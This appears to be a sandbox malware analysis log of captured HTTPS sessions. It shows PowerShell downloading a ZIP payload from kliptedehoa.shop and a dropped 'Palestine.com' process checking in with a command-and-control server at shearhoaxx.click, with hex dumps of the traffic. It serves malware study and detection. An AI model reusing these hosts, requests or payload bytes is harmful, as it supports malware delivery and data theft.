                                                                                                                                                                                                                                            10192.168.2.1649711104.21.35.894434540C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC81OUTGET /int_clp_pan.txt HTTP/1.1
                                                                                                                                                                                                                                            Host: kliptedehoa.shop
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC906INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                            Content-Length: 18817091
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            ETag: "b3923a3753f6cfb886cb3c0eb9a482eb"
                                                                                                                                                                                                                                            Last-Modified: Tue, 10 Dec 2024 02:05:13 GMT
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=348v%2FPfWNaClNjHw01ZpFEhcPdqh9h7AwWKqnsRMEo3vyMPr7UyMF%2FLccV9WwYJbqNQiw9UcK700%2FBecTuLtsZPvrUPBzBJN2reYWjGZmwlXqxpl7vuP8Kd3F%2F16e%2BifDjPV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d3a3d16438c-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1521&rtt_var=586&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2864&recv_bytes=695&delivery_rate=1844598&cwnd=245&unsent_bytes=0&cid=9d0e8da03cc473c1&ts=627&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC463INData Raw: 50 4b 03 04 14 00 08 00 08 00 e8 89 89 59 00 00 00 00 00 00 00 00 36 cb 5b 00 06 00 20 00 70 6a 6e 62 73 68 55 54 0d 00 07 95 17 57 67 aa a1 57 67 aa a1 57 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 4c 5b 09 7c 53 55 d6 bf f3 89 e2 32 23 3a 28 9d 01 85 99 41 05 c5 01 c5 5a 90 96 86 34 5b 93 34 49 b3 37 6d 96 36 69 f6 e5 a5 69 9a a4 2c ad b2 94 91 55 aa c0 88 4a 15 46 64 93 0a 08 c5 2e 89 a3 33 a2 82 e2 d0 25 0a 48 55 28 65 0a b4 0e a8 c5 96 26 df 39 f7 15 67 fa 1b c6 36 79 ef be b3 fc cf 39 ff 73 ee 7d 84 04 48 21 d1 f2 a2 f9 32 a2 2f 24 e5 11 19 21 25 84 c4 88 db 42 fc 05 3e 02 3f 36 42 7f 14 84 44 b4 a4 0c 7f 75 e3 ff 85 a3 5e 42 a4 84 94 97 5a 09 e1 49 e0 13 33 fc d3 94 96 10 15 7c 90 87 97 78 0b e0 bf 72 f6 76 5d 51 a1 95 e1 11 1e 7c 47 2a e0 9f
                                                                                                                                                                                                                                            Data Ascii: PKY6[ pjnbshUTWgWgWguxL[|SU2#:(AZ4[4I7m6ii,UJFd.3%HU(e&9g6y9s}H!2/$!%B>?6BDu^BZI3|xrv]Q|G*
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: c4 46 af 23 ae 72 3f ac 2f d0 54 e1 1f 56 b8 0c 56 30 81 74 d4 8a 6a 54 96 c0 c2 68 a8 2a 02 d6 b1 56 39 0a 09 01 43 5a 35 44 44 17 30 da 88 85 47 14 76 78 9c 59 06 9a 55 12 1b 7a 4e a7 ac 32 e2 3d d5 78 8d 10 2d e0 22 36 1e fb 4c b7 97 9f 07 4b 8a a4 61 42 94 f0 25 5c 48 1c a8 21 09 7b 85 f4 0a 83 12 dc 43 7f 53 12 4d 31 7d 78 25 31 dc 94 d9 16 13 86 47 31 11 53 a3 a8 0c fc 56 5a 2d 31 11 15 1a 84 e4 9b 6d f0 40 ed a8 74 d4 8b 42 61 b0 3c 9f f8 63 54 31 35 f5 08 60 14 fe 63 a1 e2 19 8a d0 14 56 89 ab 8a 6a 1d 66 05 a2 3f 7c 6b 39 6b 51 be 51 6f 22 f9 7e c6 88 e0 03 fc 3a c1 4a 0e 23 22 c9 6c d3 54 32 7a 31 e1 86 dd 7c 34 4e 25 1a 08 5c 1e 56 88 89 93 d8 03 3e 10 3d 46 ac 22 3e 04 82 39 50 1d 2c 0d 93 72 0a 6a 9f 90 a8 10 7b 61 f0 41 be a6 20 48 f2 f2 c4
                                                                                                                                                                                                                                            Data Ascii: F#r?/TVV0tjTh*V9CZ5DD0GvxYUzN2=x-"6LKaB%\H!{CSM1}x%1G1SVZ-1m@tBa<cT15`cVjf?|k9kQQo"~:J#"lT2z1|4N%\V>=F">9P,rj{aA H
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: dd a4 2c 79 05 f0 75 d0 65 a7 c9 c6 ef b3 13 3e 4f 28 71 12 67 79 b9 fd 17 28 07 d4 9e 0a c2 8f 50 62 44 53 8d 87 08 d9 94 13 26 8e 00 11 55 b0 4c d3 15 8c 01 e8 0d 60 bf 90 49 c8 85 1c 8f 25 5c 03 36 90 16 97 22 48 e5 32 23 09 53 5f 02 88 aa 31 2b fb 89 46 02 0f 06 29 ab 89 3c a2 74 c9 45 c4 86 e0 86 75 e5 24 a4 a3 32 62 09 21 42 f6 a9 6e a2 2f 11 12 b1 86 2d 11 44 19 c1 d0 e1 87 7e a1 ba 48 49 3c d5 3a cc 29 b1 ff c2 05 68 0f 71 d0 f8 57 68 04 44 c7 cf cf 53 69 24 05 58 54 6d 6a 4a 48 8a c5 31 ab 1b 6c a6 97 60 a4 15 89 4a 75 52 1f 78 b2 58 07 99 31 a4 42 6f 96 10 2d 5c 2a 12 72 e5 b4 ee 22 4d 8a f9 a9 f9 f4 46 42 b3 3e 28 0b de b3 00 50 d4 2a f0 48 81 c2 4a af 22 8a 22 8a 89 12 a9 18 8b 4a 4c 64 2d f6 06 1c 41 0f c4 43 94 fc 92 2e aa 48 50 e6 f6 c1 27
                                                                                                                                                                                                                                            Data Ascii: ,yue>O(qgy(PbDS&UL`I%\6"H2#S_1+F)<tEu$2b!Bn/-D~HI<:)hqWhDSi$XTmjJH1l`JuRxX1Bo-\*r"MFB>(P*HJ""JLd-AC.HP'
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: 8a 79 90 ea a0 83 a3 65 13 c4 54 00 d2 0c d4 38 9a 70 94 38 2d 44 a6 a4 21 9c 4f 2f 90 95 30 08 7d e0 32 25 48 37 8b dd 42 d0 3d 82 a5 84 f0 c0 40 16 91 84 05 82 8a b8 fc f2 d1 0e 92 41 8c 44 4a 5d a0 7e a9 26 6a a3 ad 0d 43 01 2c 2d a0 f9 1c ac 56 40 87 5d d0 d0 89 48 a5 90 af 0b 40 fc 1a f4 f6 30 24 56 bd 04 5c a0 07 c6 50 48 c3 03 da 7f cc 43 36 31 8d 4f 03 ed b2 d1 38 a2 10 96 d1 ca 20 9d 15 10 9f d4 6f 71 94 11 8f 86 f8 f9 f4 46 7e 01 19 a5 14 41 39 7d 10 0a 5c 2a a2 35 3e 52 76 13 7a e0 56 77 88 98 68 b3 c9 76 b0 52 0a 3f 8c 4a 64 5b 00 20 2b 32 60 96 f8 e0 7c c8 44 f1 0f 1c 95 8c 92 51 7b 80 12 2c 1d 0d c7 a2 d2 a0 9d 6a 88 31 e2 67 2f d0 62 65 29 20 aa 3c 30 4d 55 79 29 54 eb 40 58 ee 80 2f 2b 24 58 a2 41 96 32 49 a4 4c 8e a8 73 89 63 e2 5f 50 56
                                                                                                                                                                                                                                            Data Ascii: yeT8p8-D!O/0}2%H7B=@ADJ]~&jC,-V@]H@0$V\PHC61O8 oqF~A9}\*5>RvzVwhvR?Jd[ +2`|DQ{,j1g/be) <0MUy)T@X/+$XA2ILsc_PV
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: 2c be 88 4f c2 47 4a 29 c2 b4 e4 02 2b 84 a4 01 96 3f 92 52 23 c6 91 b3 80 8e 78 11 d2 65 6a 06 e7 90 95 62 ba ae 0e fe 71 d1 de 01 bc ba 82 95 5a 02 95 1f 43 a6 24 26 92 13 6d 1e 60 0c 22 ce 40 87 d3 0a 3a b2 8e 8a 0c 90 6f 30 3e 29 4c 1d ec a8 1a 6d 1c 46 e3 a2 7b 68 0d 11 43 ff 05 31 ef c7 d0 f2 18 c8 e8 94 1b 4a 0b 9f 62 54 41 ec c2 b0 ce c2 0f aa 18 91 db 4c 6f d2 ca 31 a6 f3 44 98 49 8a 48 89 d6 0b ed 28 5b 02 e0 7a 48 0a 4a 3b 29 43 16 27 d7 42 5a 52 47 9d 15 14 43 0a 14 85 af 82 00 60 13 a2 b3 98 b2 12 19 34 be 2e 40 62 61 15 c9 f3 19 51 5d 2b e1 07 29 2d a0 c0 b4 d0 c1 a2 54 83 f6 ae b0 e7 51 fd 29 f3 81 2b 6c 96 22 12 62 e4 78 93 08 5d 8a 37 e9 08 b7 28 40 b8 01 56 0b 8b 20 40 3d 15 29 a7 4e 33 41 fd 93 1a a9 09 e8 c5 28 33 e3 18 2d 8a a4 44 41
                                                                                                                                                                                                                                            Data Ascii: ,OGJ)+?R#xejbqZC$&m`"@:o0>)LmF{hC1JbTALo1DIH([zHJ;)C'BZRGC`4.@baQ]+)-TQ)+l"bx]7(@V @=)N3A(3-DA
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: 7b 01 26 0a 5b 14 8b 25 a2 8e e5 d4 d8 12 16 b1 5b 40 c4 61 a0 50 2d 18 ad 24 06 2c 13 a3 dd 10 6e 06 d9 c2 21 ca 8d d4 3c 22 77 8c ce 29 c1 d6 41 b5 8b 08 68 14 62 56 a8 92 62 6a c5 69 57 09 09 4a 24 ec 64 03 c3 9d 50 36 2a a3 1c cb 5d 9e 07 37 e6 39 b0 5a d0 8c a6 a8 36 12 31 cd 95 16 33 3e 11 fc a2 f5 b0 56 27 e1 7c fe 28 30 89 11 b0 a2 f3 83 46 21 5f 09 08 64 2c c0 e7 57 10 b6 db ae e0 51 f2 51 8a 4e fa a5 ae 12 43 b9 c0 38 fa ab 15 6d 2f 31 e8 c0 3a 0a 45 80 09 51 b5 49 31 b5 63 01 29 2b 08 b3 ec 04 e7 f9 b6 4a 44 8c 2a a6 54 83 bc d5 38 d0 75 05 ec d2 6a 31 31 53 d4 21 5d 54 03 d7 51 90 6a 63 d9 28 b5 c8 27 0a 0b db 02 40 aa a8 a6 a5 bc 88 a8 bc 12 a3 9e 18 74 72 b0 6e c4 4a bc e0 64 11 ff 17 d9 f0 c9 01 5a f3 45 f9 95 78 07 ce 85 31 19 2a cb b1 c0
                                                                                                                                                                                                                                            Data Ascii: {&[%[@aP-$,n!<"w)AhbVbjiWJ$dP6*]79Z613>V'|(0F!_d,WQQNC8m/1:EQI1c)+JD*T8uj11S!]TQjc('@trnJdZEx1*
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: 18 5a e3 02 e2 a1 85 e4 16 60 b7 9f 45 78 8d 9d 94 56 e1 e3 19 62 b2 b1 53 53 af 50 c5 0e 1c 94 b8 29 39 3a 55 c0 c1 93 c6 52 e0 ce a7 72 53 5c 59 71 a7 88 55 a9 d0 26 24 6c ef 5d e5 c4 d2 62 d5 b2 76 73 f3 30 64 2b 8a 41 23 0f 44 8d c6 af 25 55 98 62 14 a6 51 d2 56 50 c8 5a c8 47 0c f9 72 48 4e 31 05 1e 4c f3 a3 05 ac e5 68 64 30 43 50 72 73 9f 52 1f d2 52 c3 c1 03 cc 14 05 15 2e 51 15 6a 29 76 88 1c 25 34 09 7a e8 7a ea f2 9b fb 4f f0 23 97 83 bc 51 8d 11 be 47 ac f8 78 48 42 91 85 94 90 7c a7 9d cf d3 d2 69 a3 9a 94 14 87 b1 5e 97 b1 c7 93 0d b8 c9 85 07 c0 89 af 44 23 d2 8c 36 91 58 cc 30 31 a8 6f 2e 0e bf 95 b1 e3 04 58 55 75 73 ff b4 04 7e 85 3b 45 3c b4 bd 83 c4 c0 7d 62 a5 02 ee f4 d0 29 31 03 da 63 7b cf 4e 50 24 1a 9d 48 8b c9 c2 4a 8d 0a ca ba
                                                                                                                                                                                                                                            Data Ascii: Z`ExVbSSP)9:URrS\YqU&$l]bvs0d+A#D%UbQVPZGrHN1Lhd0CPrsRR.Qj)v%4zzO#QGxHB|i^D#6X01o.XUus~;E<}b)1c{NP$HJ
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: a8 13 95 8c 56 08 bc cd 84 87 f2 0b cd 10 d5 e5 45 e8 78 79 4c 14 14 98 85 38 55 aa 02 28 e1 fe ba 82 88 43 f9 de 0a aa 79 f0 e6 9c 83 4b 09 61 39 f4 08 46 07 f4 af f4 15 8e d1 7d 89 12 dc 98 c5 77 ce 20 2e 7d f6 18 b5 9c 7e b4 bc 2b b1 e3 f1 23 46 c3 56 b9 9a f0 a1 07 32 d1 f9 7d 41 01 4f c5 ab a6 55 c9 57 06 a6 aa 82 54 41 2d ad 25 1e 7c 9f 8c b2 3b 9a f9 4a a5 b0 6e 7e 88 38 ab d8 91 30 9e f7 82 cb 95 24 58 4e 9b bf 00 9a ca c0 47 ff 97 28 5d a4 02 30 5a 19 21 f9 7a 44 65 88 44 e5 2c 89 91 e8 4b 54 01 30 47 15 fb ca 16 41 a0 fb 71 4b 19 df c4 01 f3 29 85 e0 5b 1d 7e 29 a3 d4 0a 2d 8c c7 09 29 03 e0 17 52 23 54 90 40 55 74 f4 34 bf 94 88 74 1e 11 f9 9f ac 09 6a 3a 62 70 9d 07 9f 8b 07 1d 2d 2c 86 8a 70 d9 02 4a e8 47 07 3b de 28 3c 0b a4 10 49 59 7d 1c
                                                                                                                                                                                                                                            Data Ascii: VExyL8U(CyKa9F}w .}~+#FV2}AOUWTA-%|;Jn~80$XNG(]0Z!zDeD,KT0GAqK)[~)-)R#T@Ut4tj:bp-,pJG;(<IY}
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: ef 0a a1 2c 2e cc 7b c4 50 9e 87 3a 15 99 e8 63 b5 60 90 98 55 a9 c1 71 4e a9 a0 2a 68 27 36 69 09 f9 e5 15 0f 3c 9a 05 e6 2b 60 f4 a3 3b 82 e1 52 8c ec 28 00 c6 4d 5b 63 6e 54 4f d8 d7 c0 3d b8 0d 8b c4 9a c6 b2 9f 61 97 90 51 02 50 e2 30 a3 c7 4a b1 5c 02 a3 d4 98 e8 ef 86 02 2b 2d 80 81 42 71 e4 e6 cb 94 8c 8b a7 a4 8f 57 53 7e 44 f8 52 ca e3 f3 ab 20 d8 84 02 52 cd 50 4d 64 f8 62 4e 41 be bc 1c b1 68 d2 42 17 26 88 11 7b c8 1b c3 b0 b1 d1 51 97 2a a6 2b 83 2c 52 e1 03 7b 52 43 98 b8 4a 2c 1b 9e c0 e8 01 5e 37 be df e7 24 c5 12 a0 01 25 24 6c 23 56 00 89 bd d8 c8 fa 41 26 f7 39 f5 94 7b 58 0b 30 4c f3 1c 0e 03 11 eb 70 df a6 02 37 9d 64 a4 10 4c 53 65 af e0 d2 d7 e6 74 3e 7c 2b 1f fa 3f 36 4f 12 09 3b 16 41 60 f1 11 71 7c 39 c4 d6 cd 77 dd 04 42 3a b6
                                                                                                                                                                                                                                            Data Ascii: ,.{P:c`UqN*h'6i<+`;R(M[cnTO=aQP0J\+-BqWS~DR RPMdbNAhB&{Q*+,R{RCJ,^7$%$l#VA&9{X0Lp7dLSet>|+?6O;A`q|9wB:
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: bb 3f 7f 62 5a fc 58 46 05 27 f0 54 e7 aa c6 4e c3 89 5d f5 96 d7 7f 73 32 ee 5e f1 52 22 3c 83 a9 6b de ba 2d 3d 72 fb 60 fa 65 6d bd 68 55 d1 d6 ad a9 64 34 f7 ba 7f 42 cd c5 0d d1 a1 71 1b ea a5 9c da 5f 75 a7 7d 6d e9 cb bf 37 0e 8d d7 d6 73 c6 ff fe 8b 58 f3 47 ed 96 e1 40 ff 07 77 fd 8e c9 6c de 91 cc 7c 58 30 ee b6 ef ef fd d3 fc e1 bb bb 72 9e d8 70 23 3a 25 70 b2 76 7b 72 d3 86 ef bf fa f0 db 8e c0 94 e5 33 57 ac 7c 27 df 7a f4 db 8c f2 47 1b 76 4f 9d 92 39 1c 67 72 6f 08 26 e4 8c 75 27 df ff ba 67 95 62 a3 63 5d 9c e3 ba 7f f6 31 e5 f9 58 38 f0 e8 07 23 a6 c7 5b ff 7c 25 a9 4b 4d ca ce dc b6 d4 b8 67 55 5d f2 50 6b c1 c0 4b b3 ca 06 6f 3f f6 c4 65 59 83 cf fc 5d 7a e9 b6 fb 6e 7f cf 18 cc 08 58 f3 c8 86 bf 7c fb b7 b7 76 e4 ee bb 92 7d e2 80 b2
                                                                                                                                                                                                                                            Data Ascii: ?bZXF'TN]s2^R"<k-=r`emhUd4Bq_u}m7sXG@wl|X0rp#:%pv{r3W|'zGvO9gro&u'gbc]1X8#[|%KMgU]PkKo?eY]znX|v}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            11192.168.2.1649713172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:04 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-23 09:36:05 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:05 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=7mjm2v2vddafnhcqec9oe15ulc; expires=Fri, 18 Apr 2025 03:22:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFk%2FYJSbjHHj8%2FrvZzoNPaPviJFG4uizDQu%2B1qEuuVD1cnb3TLt1xaVUaETfqJR%2BM2SUr%2B4%2BuyE%2Bjgi%2BgE3V%2Bxa%2FgKRw4qYO3DF5MuxtLrXlwkzeFFiGRZmehsHtEXIJXl4G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d7bbc9b42d7-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1669&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=907&delivery_rate=1651583&cwnd=245&unsent_bytes=0&cid=dcb5c1dff38fcb1f&ts=1061&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-23 09:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            12192.168.2.1649714172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:06 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:06 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=Dvh8ui--888&j=
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=pm70dp7rnj05c6776mgk1et4ls; expires=Fri, 18 Apr 2025 03:22:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtsvpqACoBoDzr2tTuyxY34gw8jmSFNVJkVL%2F2qDL6whf2EyMlGZFLUHKJ5Nh49vB5v8JhJDmDECx2txC6RNR3sgewiAhi5n6rUgtkwkuKETdGkZVTdpVe0RLMvMdGwzs6Dq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d89f8300f79-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=945&delivery_rate=1763285&cwnd=241&unsent_bytes=0&cid=a3e0775ef75b2eea&ts=800&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC252INData Raw: 63 34 65 0d 0a 56 67 64 79 6e 6d 2b 68 4b 2b 6b 2f 36 79 4c 2f 6a 65 75 2f 63 6c 71 6a 71 74 4c 48 6f 58 63 6d 6d 5a 67 58 4c 2f 50 39 2f 2b 49 74 4a 51 53 38 56 5a 55 48 79 30 79 4f 41 4d 58 35 6d 63 6f 58 64 6f 48 4c 74 75 57 62 45 55 66 31 36 33 49 44 30 59 75 53 77 47 78 68 45 2f 49 63 78 41 66 4c 57 70 4d 41 78 64 61 51 6e 52 63 30 67 5a 44 77 6f 73 73 56 52 2f 58 36 64 6b 53 63 6a 5a 4f 42 50 6d 73 56 39 67 72 43 54 34 68 54 68 6b 65 61 36 49 72 56 48 44 50 4f 77 72 2f 6c 6a 56 56 44 34 37 6f 74 44 62 36 59 69 34 4d 62 5a 67 48 31 54 64 77 48 6b 68 32 4f 54 4e 32 33 79 64 34 58 4f 4d 2f 4d 74 71 7a 4a 48 30 37 39 2b 33 4e 46 67 35 53 5a 69 6a 35 6c 46 76 63 41 79 31 75 46 57 59 46 4d 6e 4f 4b 4b 6e 56 35 34 78 74 44 77 2f 59 4e 47 64 76 6a
                                                                                                                                                                                                                                            Data Ascii: c4eVgdynm+hK+k/6yL/jeu/clqjqtLHoXcmmZgXL/P9/+ItJQS8VZUHy0yOAMX5mcoXdoHLtuWbEUf163ID0YuSwGxhE/IcxAfLWpMAxdaQnRc0gZDwossVR/X6dkScjZOBPmsV9grCT4hThkea6IrVHDPOwr/ljVVD47otDb6Yi4MbZgH1TdwHkh2OTN23yd4XOM/MtqzJH079+3NFg5SZij5lFvcAy1uFWYFMnOKKnV54xtDw/YNGdvj
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 72 5a 46 69 63 6a 35 76 41 4b 79 73 4a 76 41 72 50 43 64 4d 64 67 55 79 54 36 6f 72 53 46 7a 6e 42 32 72 2b 6c 77 42 31 4d 2f 2f 42 36 51 70 36 52 6c 34 63 38 62 42 66 7a 43 73 74 50 68 46 37 4a 44 74 33 6f 6b 5a 31 49 65 4f 48 59 73 36 62 58 47 46 57 37 35 54 74 55 30 5a 69 52 77 47 77 6c 46 76 49 4d 7a 6b 6d 5a 56 59 4a 4c 6d 50 32 43 31 42 30 31 77 63 57 36 71 73 41 56 51 2f 48 77 65 6b 65 56 6b 70 43 47 4e 47 56 51 73 6b 33 45 55 63 73 46 79 57 4f 59 2f 34 37 52 42 6e 72 37 69 4b 2f 72 32 6c 56 44 39 37 6f 74 44 5a 6d 61 6e 6f 4d 2f 61 68 50 30 42 74 46 4a 6d 56 75 45 52 59 2f 70 6a 4e 4d 61 4f 39 50 43 76 71 50 41 48 45 2f 79 2f 33 4a 4a 30 64 48 64 68 79 77 6c 53 4c 77 73 7a 6b 4b 48 56 35 35 41 33 66 44 48 78 46 41 2f 7a 59 6a 6f 35 63 63 55 51 50
                                                                                                                                                                                                                                            Data Ascii: rZFicj5vAKysJvArPCdMdgUyT6orSFznB2r+lwB1M//B6Qp6Rl4c8bBfzCstPhF7JDt3okZ1IeOHYs6bXGFW75TtU0ZiRwGwlFvIMzkmZVYJLmP2C1B01wcW6qsAVQ/HwekeVkpCGNGVQsk3EUcsFyWOY/47RBnr7iK/r2lVD97otDZmanoM/ahP0BtFJmVuERY/pjNMaO9PCvqPAHE/y/3JJ0dHdhywlSLwszkKHV55A3fDHxFA/zYjo5ccUQP
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 69 64 2f 46 77 42 35 6d 42 50 38 48 67 58 79 49 55 34 64 48 69 36 2b 57 6b 77 6c 34 78 73 54 77 2f 59 4d 59 52 66 50 38 5a 30 4b 63 6e 4a 4f 4f 4f 32 41 66 39 41 33 44 52 49 35 5a 67 6b 75 65 34 6f 33 50 47 6a 6a 4a 7a 62 47 76 79 56 55 4b 75 2f 31 74 44 63 6e 66 72 4a 63 2f 4a 79 58 2f 41 38 31 4f 6e 52 32 57 44 6f 53 76 6a 74 46 51 59 49 48 46 75 4b 44 47 47 6b 58 78 39 48 42 48 6e 5a 65 54 67 79 5a 71 46 50 77 42 79 30 4f 47 55 34 31 49 6c 4f 53 43 32 78 41 35 79 34 6a 2b 35 63 51 4e 42 4b 4f 36 51 55 71 64 6b 70 4c 43 41 57 59 65 38 67 72 56 43 5a 51 54 6b 41 43 61 34 38 6d 46 55 44 54 49 79 4c 75 76 78 78 56 44 39 76 39 32 53 70 4b 53 6d 6f 6f 36 59 68 54 77 42 4d 35 50 69 31 71 4e 52 59 2f 71 67 4e 45 63 65 49 2b 49 74 37 32 44 54 51 54 55 2f 57 4e
                                                                                                                                                                                                                                            Data Ascii: id/FwB5mBP8HgXyIU4dHi6+Wkwl4xsTw/YMYRfP8Z0KcnJOOO2Af9A3DRI5Zgkue4o3PGjjJzbGvyVUKu/1tDcnfrJc/JyX/A81OnR2WDoSvjtFQYIHFuKDGGkXx9HBHnZeTgyZqFPwBy0OGU41IlOSC2xA5y4j+5cQNBKO6QUqdkpLCAWYe8grVCZQTkACa48mFUDTIyLuvxxVD9v92SpKSmoo6YhTwBM5Pi1qNRY/qgNEceI+It72DTQTU/WN
